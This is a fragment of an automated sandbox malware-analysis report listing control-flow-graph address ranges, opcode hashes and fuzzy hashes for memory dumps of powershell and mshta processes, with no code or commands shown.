                                                                                      control_flow_graph 26 7fe89ab0858-7fe89ab0903 27 7fe89ab0f0d-7fe89ab0f96 26->27 28 7fe89ab0909-7fe89ab0913 26->28 36 7fe89ab0f9c-7fe89ab0fa6 27->36 37 7fe89ab1098-7fe89ab10dc 27->37 29 7fe89ab092d-7fe89ab093f 28->29 30 7fe89ab0915-7fe89ab0923 28->30 29->27 31 7fe89ab0945-7fe89ab094f 29->31 30->29 33 7fe89ab0925-7fe89ab092b 30->33 34 7fe89ab0968-7fe89ab097a 31->34 35 7fe89ab0951-7fe89ab095e 31->35 33->29 34->27 39 7fe89ab0980-7fe89ab098a 34->39 35->34 38 7fe89ab0960-7fe89ab0966 35->38 40 7fe89ab0fa8-7fe89ab0fb5 36->40 41 7fe89ab0fbf-7fe89ab0fee 36->41 52 7fe89ab10ed-7fe89ab1124 37->52 53 7fe89ab10de-7fe89ab10e7 37->53 38->34 44 7fe89ab098c-7fe89ab099a 39->44 45 7fe89ab09a4-7fe89ab09b6 39->45 40->41 46 7fe89ab0fb7-7fe89ab0fbd 40->46 41->37 65 7fe89ab0ff4-7fe89ab0ffe 41->65 44->45 50 7fe89ab099c-7fe89ab09a2 44->50 45->27 51 7fe89ab09bc-7fe89ab09c6 45->51 46->41 50->45 54 7fe89ab09c8-7fe89ab09d5 51->54 55 7fe89ab09df-7fe89ab09f9 51->55 59 7fe89ab112a-7fe89ab1190 52->59 60 7fe89ab11c1-7fe89ab11cb 52->60 53->52 54->55 62 7fe89ab09d7-7fe89ab09dd 54->62 55->27 57 7fe89ab09ff-7fe89ab0a09 55->57 63 7fe89ab0a0b-7fe89ab0a18 57->63 64 7fe89ab0a22-7fe89ab0a39 57->64 97 7fe89ab119a-7fe89ab119e 59->97 66 7fe89ab11cd-7fe89ab11d7 60->66 67 7fe89ab11d8-7fe89ab11e8 60->67 62->55 63->64 69 7fe89ab0a1a-7fe89ab0a20 63->69 64->27 74 7fe89ab0a3f-7fe89ab0a49 64->74 70 7fe89ab1017-7fe89ab1077 65->70 71 7fe89ab1000-7fe89ab100d 65->71 72 7fe89ab11ea-7fe89ab11ee 67->72 73 7fe89ab11f5-7fe89ab121a 67->73 69->64 95 7fe89ab108b-7fe89ab1097 70->95 96 7fe89ab1079-7fe89ab1084 70->96 71->70 76 7fe89ab100f-7fe89ab1015 71->76 72->73 77 7fe89ab0a4b-7fe89ab0a58 74->77 78 7fe89ab0a65-7fe89ab0a79 74->78 76->70 77->78 81 7fe89ab0a5a-7fe89ab0a63 77->81 78->27 84 7fe89ab0a7f-7fe89ab0a89 78->84 81->78 85 7fe89ab0a8b-7fe89ab0a98 84->85 86 7fe89ab0aa8-7fe89ab0abc 84->86 85->86 89 7fe89ab0a9a-7fe89ab0aa6 85->89 86->27 90 7fe89ab0ac2-7fe89ab0acc 86->90 89->86 93 7fe89ab0aee-7fe89ab0b02 90->93 94 7fe89ab0ace-7fe89ab0adb 90->94 93->27 100 7fe89ab0b08-7fe89ab0b12 93->100 94->93 99 7fe89ab0add-7fe89ab0aec 94->99 96->95 104 7fe89ab11a6-7fe89ab11be 97->104 99->93 101 7fe89ab0b34-7fe89ab0b48 100->101 102 7fe89ab0b14-7fe89ab0b21 100->102 101->27 103 7fe89ab0b4e-7fe89ab0b59 101->103 102->101 106 7fe89ab0b23-7fe89ab0b32 102->106 107 7fe89ab0b5b-7fe89ab0b88 103->107 108 7fe89ab0ba0-7fe89ab0bb1 103->108 106->101 107->108 109 7fe89ab0b8a-7fe89ab0b9e 107->109 108->27 110 7fe89ab0bb7-7fe89ab0bc1 108->110 109->108 112 7fe89ab0bc3-7fe89ab0bf0 110->112 113 7fe89ab0c05-7fe89ab0c4f 110->113 112->113 115 7fe89ab0bf2-7fe89ab0c03 112->115 113->27 119 7fe89ab0c55-7fe89ab0c5f 113->119 115->113 120 7fe89ab0c7b-7fe89ab0cdd 119->120 121 7fe89ab0c61-7fe89ab0c71 119->121 120->27 126 7fe89ab0ce3-7fe89ab0ced 120->126 121->120 122 7fe89ab0c73-7fe89ab0c74 121->122 122->120 127 7fe89ab0d09-7fe89ab0d4a 126->127 128 7fe89ab0cef-7fe89ab0cff 126->128 127->27 132 7fe89ab0d50-7fe89ab0d5a 127->132 128->127 129 7fe89ab0d01-7fe89ab0d02 128->129 129->127 133 7fe89ab0d5c-7fe89ab0d6c 132->133 134 7fe89ab0d76-7fe89ab0dda 132->134 133->134 135 7fe89ab0d6e-7fe89ab0d6f 133->135 134->27 139 7fe89ab0de0-7fe89ab0ded 134->139 135->134 140 7fe89ab0e09-7fe89ab0e70 139->140 141 7fe89ab0def-7fe89ab0dff 139->141 140->27 146 7fe89ab0e76-7fe89ab0e83 140->146 141->140 142 7fe89ab0e01-7fe89ab0e02 141->142 142->140 147 7fe89ab0e85-7fe89ab0e95 146->147 148 7fe89ab0e9f-7fe89ab0f0a 146->148 147->148 149 7fe89ab0e97-7fe89ab0e98 147->149 149->148
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.446317268.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4a8bbf60c988fb39e57dc71de413d088f2c4f7770e96f337568715178890fdc
                                                                                      • Instruction ID: f990f37338827866c0675da67d866da78ac29ccb3ed1f2ce9c42a909aab45189
                                                                                      • Opcode Fuzzy Hash: b4a8bbf60c988fb39e57dc71de413d088f2c4f7770e96f337568715178890fdc
                                                                                      • Instruction Fuzzy Hash: D272E630A0CB894FDB59EB2C8494A757BE1EF5A744F1801EED48EC72A3DA24EC45C791

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 152 7fe89ab2cd9-7fe89ab2d89 153 7fe89ab326d-7fe89ab3326 152->153 154 7fe89ab2d8f-7fe89ab2d99 152->154 155 7fe89ab2d9b-7fe89ab2da8 154->155 156 7fe89ab2db2-7fe89ab2db9 154->156 155->156 158 7fe89ab2daa-7fe89ab2db0 155->158 159 7fe89ab2dbb-7fe89ab2dce 156->159 160 7fe89ab2dd0 156->160 158->156 161 7fe89ab2dd2-7fe89ab2dd4 159->161 160->161 162 7fe89ab2dda-7fe89ab2de6 161->162 163 7fe89ab31e8-7fe89ab31f2 161->163 162->153 166 7fe89ab2dec-7fe89ab2df6 162->166 167 7fe89ab31f4-7fe89ab3204 163->167 168 7fe89ab3205-7fe89ab3215 163->168 169 7fe89ab2df8-7fe89ab2e05 166->169 170 7fe89ab2e12-7fe89ab2e22 166->170 172 7fe89ab3217-7fe89ab321b 168->172 173 7fe89ab3222-7fe89ab326c 168->173 169->170 174 7fe89ab2e07-7fe89ab2e10 169->174 170->163 179 7fe89ab2e28-7fe89ab2e5c 170->179 172->173 174->170 179->163 184 7fe89ab2e62-7fe89ab2e6e 179->184 184->153 185 7fe89ab2e74-7fe89ab2e7e 184->185 186 7fe89ab2e97-7fe89ab2e9c 185->186 187 7fe89ab2e80-7fe89ab2e8d 185->187 186->163 189 7fe89ab2ea2-7fe89ab2ea7 186->189 187->186 188 7fe89ab2e8f-7fe89ab2e95 187->188 188->186 189->163 190 7fe89ab2ead-7fe89ab2eb2 189->190 190->163 192 7fe89ab2eb8-7fe89ab2ec7 190->192 193 7fe89ab2ed7 192->193 194 7fe89ab2ec9-7fe89ab2ed3 192->194 197 7fe89ab2edc-7fe89ab2ee9 193->197 195 7fe89ab2ef3-7fe89ab2f7e 194->195 196 7fe89ab2ed5 194->196 204 7fe89ab2f92-7fe89ab2fb4 195->204 205 7fe89ab2f80-7fe89ab2f8b 195->205 196->197 197->195 199 7fe89ab2eeb-7fe89ab2ef1 197->199 199->195 206 7fe89ab2fb6-7fe89ab2fc0 204->206 207 7fe89ab2fc4 204->207 205->204 208 7fe89ab2fc2 206->208 209 7fe89ab2fe0-7fe89ab306e 206->209 210 7fe89ab2fc9-7fe89ab2fd6 207->210 208->210 217 7fe89ab3082-7fe89ab30a0 209->217 218 7fe89ab3070-7fe89ab307b 209->218 210->209 211 7fe89ab2fd8-7fe89ab2fde 210->211 211->209 219 7fe89ab30a2-7fe89ab30ac 217->219 220 7fe89ab30b0 217->220 218->217 221 7fe89ab30cd-7fe89ab315d 219->221 222 7fe89ab30ae 219->222 223 7fe89ab30b5-7fe89ab30c3 220->223 230 7fe89ab315f-7fe89ab316a 221->230 231 7fe89ab3171-7fe89ab31ca 221->231 222->223 223->221 224 7fe89ab30c5-7fe89ab30cb 223->224 224->221 230->231 234 7fe89ab31d2-7fe89ab31e7 231->234
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.446317268.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9c4703799d0311633123ff9fee790dab6a7db7537879cc057d447807c370e03
                                                                                      • Instruction ID: cbff5f2b7c815c544afd0085b2d389460efecf4d6e8840e62a04f113304c71d4
                                                                                      • Opcode Fuzzy Hash: e9c4703799d0311633123ff9fee790dab6a7db7537879cc057d447807c370e03
                                                                                      • Instruction Fuzzy Hash: 0B220530A0CB894FD799DB2C94546787BE2FF9A344F2401EED48ED72A3DA24AC56C741

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 235 7fe89ab1100-7fe89ab1124 237 7fe89ab112a-7fe89ab119e 235->237 238 7fe89ab11c1-7fe89ab11cb 235->238 248 7fe89ab11a6-7fe89ab11be 237->248 239 7fe89ab11cd-7fe89ab11d7 238->239 240 7fe89ab11d8-7fe89ab11e8 238->240 241 7fe89ab11ea-7fe89ab11ee 240->241 242 7fe89ab11f5-7fe89ab121a 240->242 241->242
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.446317268.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7fe89ab0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8aea9fe2ccf3603f37ccf705d32995bd026ad1c7db0758b2f4499f8d05cd1541
                                                                                      • Instruction ID: 2d08dc097913c6b1439a6d4b8b6e68b7428762cee7f032df24988539eb24682f
                                                                                      • Opcode Fuzzy Hash: 8aea9fe2ccf3603f37ccf705d32995bd026ad1c7db0758b2f4499f8d05cd1541
                                                                                      • Instruction Fuzzy Hash: C321060170DBC91FE34B937C29902657FD1EF4B258B3901EBE58EDB2A3D8084C658361
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000003.456450577.0000000002E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_3_2e20000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction ID: b57f80ae63ba5102afb9b6bfbfd6e825482bfaa9c4c405bc8efd786affa5373f
                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000003.456450577.0000000002E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_3_2e20000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction ID: b57f80ae63ba5102afb9b6bfbfd6e825482bfaa9c4c405bc8efd786affa5373f
                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000003.456450577.0000000002E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_3_2e20000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction ID: b57f80ae63ba5102afb9b6bfbfd6e825482bfaa9c4c405bc8efd786affa5373f
                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                      • Instruction Fuzzy Hash: